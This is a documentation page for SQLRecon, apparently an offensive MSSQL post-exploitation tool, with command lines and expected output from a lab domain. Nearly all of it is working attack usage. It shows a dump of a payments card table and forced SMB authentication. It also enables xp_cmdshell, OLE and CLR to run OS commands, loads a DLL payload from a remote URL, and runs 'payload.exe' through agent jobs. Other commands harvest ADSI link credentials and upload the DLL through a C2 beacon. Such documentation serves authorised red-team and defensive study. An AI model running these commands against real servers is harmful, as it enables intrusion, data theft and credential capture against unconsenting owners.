-
Notifications
You must be signed in to change notification settings - Fork 114
3. Standard Modules
Standard modules are executed against one or more instances of SQL server.
All modules can be executed against multiple SQL servers. An example of this has been demonstrated in the "Info (Unprivileged)' section below.
SQLRecon.exe /auth:WinToken /host:SQL02,SQL03 /m:info
Expected Output:
[*] (1/2) Executing the 'info' module on SQL02
| Object | Value |
| --------------------- | ------------------------------------- |
| ComputerName | SQL02 |
| DomainName | KAWALABS |
| ServicePid | 2612 |
| SqlServerServiceName | MSSQLSERVER |
| SqlServiceAccountName | KAWALABS\mssql_svc |
| AuthenticationMode | Windows and SQL Server Authentication |
| ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Developer Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | KAWALABS\JSmith |
| ActiveSessions | 1 |
[*] (2/2) Executing the 'info' module on SQL03
| Object | Value |
| --------------------- | ------------------------------------- |
| ComputerName | SQL03 |
| DomainName | KAWALABS |
| ServicePid | 1920 |
| SqlServerServiceName | MSSQLSERVER |
| SqlServiceAccountName | NT Service\MSSQLSERVER |
| AuthenticationMode | Windows and SQL Server Authentication |
| ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Developer Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | KAWALABS\JSmith |
| ActiveSessions | 1 |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:info
Expected Output:
[*] Executing the 'info' module on SQL01
| Object | Value |
| --------------------- | ------------------------------------- |
| ComputerName | SQL01\SQLEXPRESS |
| DomainName | KAWALABS |
| ServicePid | 7028 |
| OsMachineType | ServerNT |
| OsVersion | Windows Server 2022 Standard |
| SqlServerServiceName | MSSQL$SQLEXPRESS |
| SqlServiceAccountName | KAWALABS\mssql_svc |
| AuthenticationMode | Windows and SQL Server Authentication |
| ForcedEncryption | 0 |
| Clustered | No |
| SqlVersionNumber | 16.0.1000.6 |
| SqlMajorVersionNumber | 2022 |
| SqlServerEdition | Express Edition (64-bit) |
| SqlServerServicePack | RTM |
| OsArchitecture | X64 |
| OsVersionNumber | 2022 |
| CurrentLogon | sa |
| ActiveSessions | 1 |
SQLRecon.exe /auth:WinToken /host:SQL01 /m:whoami
Expected Output:
[*] Executing the 'whoami' module on SQL01
[*] Logged in as KAWALABS\JSmith
[*] Mapped to the user guest
[*] Server Permissions:
| permission_name |
| ----------------- |
| CONNECT SQL |
| VIEW ANY DATABASE |
[*] Database Permissions:
| permission_name |
| ----------------------------------------- |
| CONNECT |
| VIEW ANY COLUMN ENCRYPTION KEY DEFINITION |
| VIEW ANY COLUMN MASTER KEY DEFINITION |
[*] Database Roles:
| Role | Membership |
| ----------------- | ---------- |
| public | Yes |
| db_owner | No |
| db_accessadmin | No |
| db_securityadmin | No |
| db_ddladmin | No |
| db_backupoperator | No |
| db_datareader | No |
| db_datawriter | No |
| db_denydatareader | No |
| db_denydatawriter | No |
| sysadmin | No |
| setupadmin | No |
| serveradmin | No |
| securityadmin | No |
| processadmin | No |
| diskadmin | No |
| dbcreator | No |
| bulkadmin | No |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:whoami
Expected Output:
[*] Executing the 'whoami' module on SQL01
[*] Logged in as sa
[*] Mapped to the user dbo
[*] Server Permissions:
| permission_name |
| --------------------------------------------- |
| CONNECT SQL |
| SHUTDOWN |
| CREATE ENDPOINT |
| CREATE ANY DATABASE |
| CREATE AVAILABILITY GROUP |
| CREATE LOGIN |
| ALTER ANY LOGIN |
| ALTER ANY CREDENTIAL |
| ALTER ANY ENDPOINT |
| ALTER ANY LINKED SERVER |
| ALTER ANY CONNECTION |
| ALTER ANY DATABASE |
| ALTER RESOURCES |
| ALTER SETTINGS |
| ALTER TRACE |
| ALTER ANY AVAILABILITY GROUP |
| ADMINISTER BULK OPERATIONS |
| AUTHENTICATE SERVER |
| EXTERNAL ACCESS ASSEMBLY |
| VIEW ANY DATABASE |
| VIEW ANY SECURITY DEFINITION |
| VIEW ANY PERFORMANCE DEFINITION |
| VIEW ANY DEFINITION |
| VIEW SERVER SECURITY STATE |
| VIEW SERVER PERFORMANCE STATE |
| VIEW SERVER STATE |
| CREATE DDL EVENT NOTIFICATION |
| CREATE TRACE EVENT NOTIFICATION |
| ALTER ANY EVENT NOTIFICATION |
| ALTER SERVER STATE |
| UNSAFE ASSEMBLY |
| ALTER ANY SERVER AUDIT |
| CREATE SERVER ROLE |
| ALTER ANY SERVER ROLE |
| CREATE ANY EVENT SESSION |
| DROP ANY EVENT SESSION |
| ALTER ANY EVENT SESSION OPTION |
| ALTER ANY EVENT SESSION ADD EVENT |
| ALTER ANY EVENT SESSION DROP EVENT |
| ALTER ANY EVENT SESSION ENABLE |
| ALTER ANY EVENT SESSION DISABLE |
| ALTER ANY EVENT SESSION ADD TARGET |
| ALTER ANY EVENT SESSION DROP TARGET |
| ALTER ANY EVENT SESSION |
| CONNECT ANY DATABASE |
| IMPERSONATE ANY LOGIN |
| SELECT ALL USER SECURABLES |
| VIEW ANY CRYPTOGRAPHICALLY SECURED DEFINITION |
| VIEW ANY ERROR LOG |
| VIEW SERVER SECURITY AUDIT |
| CONTROL SERVER |
[*] Database Permissions:
| permission_name |
| -------------------------------------------- |
| CREATE TABLE |
| CREATE VIEW |
| CREATE PROCEDURE |
| CREATE FUNCTION |
| CREATE RULE |
| CREATE DEFAULT |
| BACKUP DATABASE |
| BACKUP LOG |
| CREATE DATABASE |
| CREATE TYPE |
| CREATE ASSEMBLY |
| CREATE XML SCHEMA COLLECTION |
| CREATE SCHEMA |
| CREATE SYNONYM |
| CREATE AGGREGATE |
| CREATE ROLE |
| CREATE MESSAGE TYPE |
| CREATE SERVICE |
| CREATE CONTRACT |
| CREATE REMOTE SERVICE BINDING |
| CREATE ROUTE |
| CREATE QUEUE |
| CREATE SYMMETRIC KEY |
| CREATE ASYMMETRIC KEY |
| CREATE EXTERNAL LANGUAGE |
| CREATE EXTERNAL LIBRARY |
| CREATE FULLTEXT CATALOG |
| CREATE CERTIFICATE |
| CREATE DATABASE DDL EVENT NOTIFICATION |
| CREATE USER |
| CONNECT |
| CONNECT REPLICATION |
| CHECKPOINT |
| SUBSCRIBE QUERY NOTIFICATIONS |
| AUTHENTICATE |
| SHOWPLAN |
| ALTER ANY USER |
| ALTER ANY ROLE |
| ALTER ANY APPLICATION ROLE |
| ALTER ANY COLUMN ENCRYPTION KEY |
| ALTER ANY COLUMN MASTER KEY |
| ALTER ANY SCHEMA |
| ALTER ANY ASSEMBLY |
| ALTER ANY DATABASE SCOPED CONFIGURATION |
| ALTER ANY DATASPACE |
| ALTER ANY EXTERNAL DATA SOURCE |
| ALTER ANY EXTERNAL FILE FORMAT |
| ALTER ANY EXTERNAL LIBRARY |
| ALTER ANY EXTERNAL LANGUAGE |
| ALTER ANY EXTERNAL STREAM |
| ALTER ANY EXTERNAL JOB |
| ALTER ANY MESSAGE TYPE |
| ALTER ANY CONTRACT |
| ALTER ANY SERVICE |
| ALTER ANY REMOTE SERVICE BINDING |
| ALTER ANY ROUTE |
| ALTER ANY FULLTEXT CATALOG |
| ALTER ANY SYMMETRIC KEY |
| ALTER ANY ASYMMETRIC KEY |
| ALTER ANY CERTIFICATE |
| ALTER ANY SECURITY POLICY |
| SELECT |
| INSERT |
| UPDATE |
| DELETE |
| REFERENCES |
| EXECUTE |
| ALTER ANY DATABASE DDL TRIGGER |
| ALTER ANY DATABASE EVENT NOTIFICATION |
| ALTER ANY DATABASE AUDIT |
| CREATE ANY DATABASE EVENT SESSION |
| DROP ANY DATABASE EVENT SESSION |
| ALTER ANY DATABASE EVENT SESSION OPTION |
| ALTER ANY DATABASE EVENT SESSION ADD EVENT |
| ALTER ANY DATABASE EVENT SESSION DROP EVENT |
| ALTER ANY DATABASE EVENT SESSION ENABLE |
| ALTER ANY DATABASE EVENT SESSION DISABLE |
| ALTER ANY DATABASE EVENT SESSION ADD TARGET |
| ALTER ANY DATABASE EVENT SESSION DROP TARGET |
| ALTER ANY DATABASE EVENT SESSION |
| KILL DATABASE CONNECTION |
| VIEW ANY COLUMN ENCRYPTION KEY DEFINITION |
| VIEW ANY COLUMN MASTER KEY DEFINITION |
| VIEW DATABASE SECURITY STATE |
| VIEW DATABASE PERFORMANCE STATE |
| VIEW DATABASE STATE |
| VIEW SECURITY DEFINITION |
| VIEW PERFORMANCE DEFINITION |
| VIEW DEFINITION |
| TAKE OWNERSHIP |
| ALTER |
| ALTER ANY MASK |
| UNMASK |
| EXECUTE ANY EXTERNAL SCRIPT |
| ADMINISTER DATABASE BULK OPERATIONS |
| ALTER ANY SENSITIVITY CLASSIFICATION |
| VIEW ANY SENSITIVITY CLASSIFICATION |
| VIEW CRYPTOGRAPHICALLY SECURED DEFINITION |
| ENABLE LEDGER |
| ALTER LEDGER |
| VIEW LEDGER CONTENT |
| EXECUTE ANY EXTERNAL ENDPOINT |
| VIEW DATABASE SECURITY AUDIT |
| ALTER LEDGER CONFIGURATION |
| CONTROL |
[*] Database Roles:
| Role | Membership |
| ----------------- | ---------- |
| public | Yes |
| db_owner | No |
| db_accessadmin | No |
| db_securityadmin | No |
| db_ddladmin | No |
| db_backupoperator | No |
| db_datareader | No |
| db_datawriter | No |
| db_denydatareader | No |
| db_denydatawriter | No |
| sysadmin | Yes |
| setupadmin | Yes |
| serveradmin | Yes |
| securityadmin | Yes |
| processadmin | Yes |
| diskadmin | Yes |
| dbcreator | Yes |
| bulkadmin | Yes |
SQLRecon.exe /auth:WinToken /host:SQL02 /m:users
Expected Output:
[*] Executing the 'users' module on SQL02
[*] Users in the 'master' database
| username | create_date | modify_date | type | authentication_type |
| -------- | ------------------- | ------------------- | -------- | ------------------- |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
| name | type_desc | is_disabled | create_date | modify_date |
| ------------- | ------------- | ----------- | --------------------- | --------------------- |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/20/2024 3:23:19 PM |
| BUILTIN\Users | WINDOWS_GROUP | False | 4/24/2023 2:53:47 PM | 4/24/2023 2:53:47 PM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:users
Expected Output:
[*] Executing the 'users' module on SQL01
[*] Users in the 'master' database
| username | create_date | modify_date | type | authentication_type |
| -------- | ------------------- | ------------------- | -------- | ------------------- |
| guest | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | NONE |
| dbo | 4/8/2003 9:10:19 AM | 4/8/2003 9:10:19 AM | SQL_USER | INSTANCE |
[*] Server principals
| name | type_desc | is_disabled | create_date | modify_date |
| ---------------------------------- | ------------- | ----------- | --------------------- | --------------------- |
| sa | SQL_LOGIN | False | 4/8/2003 9:10:35 AM | 6/26/2024 1:37:32 PM |
| bulkadm | SQL_LOGIN | False | 1/30/2024 10:45:11 AM | 1/30/2024 10:45:11 AM |
| KAWALABS\Domain Users | WINDOWS_GROUP | False | 6/7/2023 1:54:14 PM | 6/7/2023 1:54:14 PM |
| NT SERVICE\SQLTELEMETRY$SQLEXPRESS | WINDOWS_LOGIN | False | 6/7/2023 10:55:46 AM | 6/7/2023 10:55:46 AM |
| NT AUTHORITY\SYSTEM | WINDOWS_LOGIN | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| BUILTIN\Users | WINDOWS_GROUP | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| NT SERVICE\MSSQL$SQLEXPRESS | WINDOWS_LOGIN | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| NT SERVICE\Winmgmt | WINDOWS_LOGIN | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| NT SERVICE\SQLWriter | WINDOWS_LOGIN | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| KAWALABS\mssql_svc | WINDOWS_LOGIN | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| KAWALABS\Domain Admins | WINDOWS_GROUP | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| KAWALABS\admin | WINDOWS_LOGIN | False | 6/7/2023 10:55:45 AM | 6/7/2023 10:55:45 AM |
| public | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| sysadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| securityadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| serveradmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| setupadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| processadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| diskadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| dbcreator | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
| bulkadmin | SERVER_ROLE | False | 4/13/2009 12:59:06 PM | 4/13/2009 12:59:06 PM |
SQLRecon.exe /auth:WinToken /h:SQL02 /module:databases
Expected Output:
[*] Executing the 'databases' module on SQL02
| dbid | name | crdate | filename |
| ---- | -------- | -------------------- | --------------------------------------------------------------------------------- |
| 1 | master | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\master.mdf |
| 2 | tempdb | 6/13/2024 8:56:06 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\tempdb.mdf |
| 3 | model | 4/8/2003 9:13:36 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\model.mdf |
| 4 | msdb | 10/8/2022 6:31:57 AM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf |
| 5 | Payments | 4/24/2023 2:49:01 PM | C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\DATA\Payments.mdf |
SQLRecon.exe /auth:WinToken /h:SQL02 /module:tables /db:Payments
Expected Output:
[*] Executing the 'tables' module on SQL02
[*] Tables in 'Payments'
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE |
| ------------- | ------------ | ---------- | ---------- |
| Payments | dbo | cc | BASE TABLE |
SQLRecon.exe /auth:WinToken /h:SQL02 /module:columns /db:Payments /table:cc
Expected Output:
[*] Executing the 'columns' module on SQL02
[*] Displaying columns from 'Payments' in 'cc'
| COLUMN_NAME |
| ----------- |
| card_brand |
| card_num |
SQLRecon.exe /a:WinToken /h:SQL01 /m:rows /db:AdventureWorks /table:SalesLT.Customer
Expected Output:
[*] Displaying number of rows from 'SalesLT.Customer' in 'AdventureWorks'
| row_count |
| --------- |
| 847 |
SQLRecon.exe /auth:WinToken /h:SQL02 /module:search /db:Payments /keyword:ca
Expected Output:
[*] Executing the 'search' module on SQL02
[*] Searching for columns containing 'ca' in 'Payments'
| table_name | column_name |
| ---------- | ----------- |
| cc | card_brand |
| cc | card_num |
SQLRecon.exe /auth:WinToken /h:SQL02 /module:query /c:"use payments; select * from cc;"
Expected Output:
[*] Executing the 'query' module on SQL02
[*] Executing 'use payments; select * from cc;'
| card_brand | card_num |
| ---------- | ------------------- |
| MasterCard | 2222 4053 4324 8877 |
| MasterCard | 2222 9909 0525 7051 |
| MasterCard | 2223 0076 4872 6984 |
| MasterCard | 2223 5771 2001 7656 |
| MasterCard | 5105 1051 0510 5100 |
| MasterCard | 5111 0100 3017 5156 |
| MasterCard | 5185 5408 1000 0019 |
| MasterCard | 5200 8282 8282 8210 |
| MasterCard | 5204 2300 8000 0017 |
| MasterCard | 5204 7400 0990 0014 |
| MasterCard | 5420 9238 7872 4339 |
| MasterCard | 5455 3307 6000 0018 |
| MasterCard | 5506 9004 9000 0436 |
| MasterCard | 5506 9004 9000 0444 |
| MasterCard | 5506 9005 1000 0234 |
| MasterCard | 5506 9208 0924 3667 |
| MasterCard | 5506 9224 0063 4930 |
| MasterCard | 5506 9274 2731 7625 |
| MasterCard | 5553 0422 4198 4105 |
| MasterCard | 5555 5537 5304 8194 |
| MasterCard | 5555 5555 5555 4444 |
| Visa | 4012 8888 8888 1881 |
| Visa | 4111 1111 1111 1111 |
| Discover | 6011 0009 9013 9424 |
| Discover | 6011 1111 1111 1117 |
| Amex | 3714 496353 98431 |
| Amex | 3782 822463 10005 |
| Diners | 3056 9309 0259 04 |
| Diners | 3852 0000 0232 37 |
| JCB | 3530 1113 3330 0000 |
| JCB | 3566 0020 2036 0505 |
SQLRecon.exe /auth:WinToken /h:SQL01 /m:smb /unc:\\172.16.10.21\some-path
Expected Output:
[*] Executing the 'smb' module on SQL01
[*] Sent SMB request request
SQLRecon.exe /auth:WinToken /h:SQL03 /module:links
Expected Output:
[*] Executing the 'links' module on SQL03
| Linked Server | product | provider | data_source | Local Login | Is Self Mapping | Remote Login |
| ------------- | ----------------------------------- | ------------ | ------------------- | ----------- | --------------- | ------------ |
| LINKADSI | Active Directory Service Interfaces | ADsDSOObject | dc01.kawalabs.local | N/A | | |
| MECM01 | SQL Server | SQLNCLI | MECM01 | N/A | | |
SQLRecon.exe /auth:WinToken /h:SQL01 /module:impersonate
Expected Output:
[*] Executing the 'impersonate' module on SQL01
| User | Can Impersonate? |
| ---- | ---------------- |
| sa | True |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:impersonate
[*] Executing the 'impersonate' module on SQL01
Expected Output:
| User | Can Impersonate? |
| ---------------------------------- | ---------------- |
| sa | True |
| KAWALABS\admin | True |
| KAWALABS\mssql_svc | True |
| NT SERVICE\SQLWriter | True |
| NT SERVICE\Winmgmt | True |
| NT SERVICE\MSSQL$SQLEXPRESS | True |
| NT AUTHORITY\SYSTEM | True |
| NT SERVICE\SQLTELEMETRY$SQLEXPRESS | True |
| bulkadm | True |
SQLRecon.exe /auth:WinToken /h:SQL01 /module:checkrpc
Expected Output:
[*] Executing the 'checkrpc' module on SQL01
[*] The following SQL servers can have RPC configured.
| name | is_rpc_out_enabled |
| ---------------- | ------------------ |
| SQL01\SQLEXPRESS | True |
| SQL02 | False |
| SQL03 | True |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:disablerpc /rhost:SQL03
Expected Output:
[*] Executing the 'disablerpc' module on SQL01
[*] Disabling RPC on SQL03
| is_rpc_out_enabled |
| ------------------ |
| False |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:enablerpc /rhost:SQL03
Expected Output:
[*] Executing the 'enablerpc' module on SQL01
[*] Enabling RPC on SQL03
| is_rpc_out_enabled |
| ------------------ |
| True |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:disablexp
Expected Output:
[*] Executing the 'disablexp' module on SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 0 | 0 | Enable or disable command shell |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:enablexp
Expected Output:
[*] Executing the 'enablexp' module on SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | ------------------------------- |
| 16390 | xp_cmdshell | 1 | 1 | Enable or disable command shell |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:disableole
Expected Output:
[*] Executing the 'disableole' module on SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 0 | 0 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:enableole
Expected Output:
[*] Executing the 'enableole' module on SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ------------------------- | ----- | ------------ | ------------------------------------------- |
| 16388 | Ole Automation Procedures | 1 | 1 | Enable or disable Ole Automation Procedures |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:disableclr
Expected Output:
[*] Executing the 'disableclr' module on SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 0 | 0 | CLR user code execution enabled in the server |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:enableclr
Expected Output:
[*] Executing the 'enableclr' module on SQL01
| configuration_id | name | value | value_in_use | description |
| ---------------- | ----------- | ----- | ------------ | --------------------------------------------- |
| 1562 | clr enabled | 1 | 1 | CLR user code execution enabled in the server |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:xpcmd /c:"dir c:\\"
Expected Output:
[*] Executing the 'xpcmd' module on SQL01
Executing 'dir c:\'
| output |
| ---------------------------------------------------------- |
| Volume in drive C has no label. |
| Volume Serial Number is 2A01-67F0 |
| |
| Directory of c:\ |
| |
| 06/07/2023 01:36 PM <DIR> Client |
| 05/08/2021 04:20 AM <DIR> PerfLogs |
| 04/23/2024 09:11 AM <DIR> Program Files |
| 06/07/2023 10:53 AM <DIR> Program Files (x86) |
| 06/07/2023 10:50 AM <DIR> SQL2022 |
| 06/07/2024 09:41 AM <DIR> temp |
| 06/07/2023 10:55 AM <DIR> Users |
| 05/29/2024 11:31 AM <DIR> Windows |
| 0 File(s) 0 bytes |
| 9 Dir(s) 37,747,826,688 bytes free |
| |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL01 /m:olecmd /c:mspaint.exe
Expected Output:
[*] Executing the 'olecmd' module on SQL01
[*] Executing 'mspaint.exe'
[*] Setting sp_oacreate to 'JNYIoMYx'.
[*] Setting sp_oamethod to 'SSdbenzH'.
[+] Executed command. Destroyed 'JNYIoMYx' and 'SSdbenzH'.
A custom .NET assembly can be supplied to SQLRecon in three ways:
- Local file path
- SMB file path
- HTTP/S URL
Please refer to sql.cs or hollow.cs to see how to build a custom DLL that is compatible with SQL CLR attacks.
If you are looking to supply the DLL using a local file path, please note that the DLL has to reside on the compromised host. For example, if you are using a C2 framework like Cobalt Strike, you will need to:
- Upload
hollow.dll
to the system you have a beacon on. - Then use
inline-ExecuteAssembly
orexecute-assembly
to executeSQLRecon
. The location of the DLL on disk should be passed into the/dll:
flag. The function which you want executed should be passed into the/function:
flag. - You can then delete the DLL after the command has run.
SQLRecon.exe /auth:Local /username:sa /password:Password123 /h:SQL01 /module:clr /dll:"C:\temp\sql.dll" /function:CustomFunctionName
Expected Output:
[*] Executing the 'clr' module on SQL01
[*] C:\temp\sql.dll is 3584 bytes.
[+] Added SHA-512 hash for 'c:\temp\sql.dll' as a trusted assembly with a random name of 'ubeQRcJj'.
[+] Loaded DLL into a new custom assembly called 'OijzCUQp'.
[+] Added the 'OijzCUQp' assembly into a new stored procedure called 'CustomFunctionName'.
[*] Executing payload ...
[*] Cleaning up. Deleting assembly 'OijzCUQp', stored procedure 'CustomFunctionName' and trusted assembly hash 'ubeQRcJj'.
You can also supply the location of a DLL to SQLRecon
via a HTTP or HTTPS link. In the example below, I've uploaded sql.dll
to an AWS S3 bucket and created a temporary pre-signed URL.
SQLRecon.exe /auth:Local /username:sa /password:Password123 /h:SQL01 /module:clr /dll:"https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>" /function:CustomFunctionName
Expected Output:
[*] Executing the 'clr' module on SQL01
[+] Downloading DLL from: https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>
[+] DLL is 3584 bytes.
[+] Added SHA-512 hash for 'https://tempbucket1.s3.us-east-1.amazonaws.com/sql.dll?<snipped>' as a trusted assembly with a random name of 'pOSvCPBU'.
[+] Loaded DLL into a new custom assembly called 'kTMflwIP'.
[+] Added the 'kTMflwIP' assembly into a new stored procedure called 'CustomFunctionName'.
[+] Executing payload ...
[+] Cleaning up. Deleting assembly 'kTMflwIP', stored procedure 'CustomFunctionName' and trusted assembly hash 'pOSvCPBU'.
SQLRecon.exe /auth:WinToken /h:SQL02 /module:agentstatus
Expected Output:
[*] Executing the 'agentstatus' module on SQL02
[*] SQL agent is running on SQL02.
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL02 /m:agentcmd /command:'c:\temp\payload.exe'
Expected Output:
[*] Executing the 'agentcmd' module on SQL02
[*] Executing 'c:\temp\payload.exe' using the 'powershell' subsystem.
[*] Setting job_name to 'egKoKFGg'.
[*] Setting step_name to 'UnGqtbxV'.
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
| fc30d30f-5728-4369-bc6f-d4c04ce9b7c9 | egKoKFGg | 1 | 7/2/2024 5:18:20 PM | 7/2/2024 5:18:20 PM |
[*] Executing job 'egKoKFGg' and waiting for 5 seconds ...
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
PowerShell is the default Agent Job subsystem.
SQLRecon.exe /a:local /u:sa /p:Password123 /h:SQL02 /m:agentcmd /command:'c:\temp\payload.exe'
Expected Output:
[*] Executing the 'agentcmd' module on SQL02
[*] Executing 'c:\temp\payload.exe' using the 'powershell' subsystem.
[*] Setting job_name to 'zzXtTiiE'.
[*] Setting step_name to 'RJesZhgm'.
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
| c9c2c943-07a9-47ee-b44f-89bec32ec033 | zzXtTiiE | 1 | 7/2/2024 5:19:22 PM | 7/2/2024 5:19:22 PM |
[*] Executing job 'zzXtTiiE' and waiting for 5 seconds ...
[*] Agent Jobs on SQL02
| job_id | name | enabled | date_created | date_modified |
| ------------------------------------ | ----------------------- | ------- | -------------------- | -------------------- |
| acd1f94c-2c9e-4659-973a-be6f35ec61d3 | syspolicy_purge_history | 1 | 4/24/2023 2:36:57 PM | 4/24/2023 2:36:58 PM |
[+] Deleted job 'zzXtTiiE' on SQL02.
SQLRecon.exe /auth:WinDomain /domain:kawalabs /username:admin /password:'Password123' /h:SQL03 /module:adsi /adsi:linkadsi /lport:49100
Expected Output:
[*] Executing the 'adsi' module on SQL03
[*] Obtaining ADSI credentials for 'linkadsi'
[+] Added SHA-512 hash for the LDAP server assembly as a trusted assembly with a random name of 'xMviVIEU'.
[+] Loaded LDAP server assembly into a new custom assembly called 'ldapServer'.
[+] Added the 'ldapServer' assembly into a new stored procedure called 'XrrLjYob'.
[*] Starting a local LDAP server on port 49100.
[*] Executing LDAP solicitation ...
[+] Obtained ADSI link credentials
|-> kawalabs\admin:Password123
[*] Cleaning up. Deleting LDAP server assembly 'ldapServer', stored procedure 'XrrLjYob' and trusted assembly hash 'xMviVIEU'.
SQLRecon.exe /a:WinToken /h:SQL02 /m:users /debug
Expected Output:
[*] Debug mode enabled. No SQL queries will be executed.
[DEBUG] CLI Arguments:
|-> /auth:WinToken
|-> /host:SQL02
|-> /module:users
|-> /debug:
[DEBUG] Connecting to 'master' on SQL02:1433 using wintoken.
|-> Connection String: Server=SQL02,1433; Database=master; Integrated Security=True; Connect Timeout=3;
|-> Data Source: SQL02,1433
|-> Database: master
|-> Server Version: 16.00.1000
|-> State: Open
|-> Workstation ID: DESKTOP-LF8Q3C6
|-> Packet Size: 8000
|-> Client Connection ID: 7c7f4880-2bc0-4449-b717-1b18db76c9c5
